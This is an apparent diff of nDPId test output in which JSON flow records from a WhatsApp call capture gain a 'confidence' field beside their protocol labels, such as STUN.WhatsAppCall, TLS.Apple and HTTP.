-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00631{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582246280,"flow_last_seen":1432582306376,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1506,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
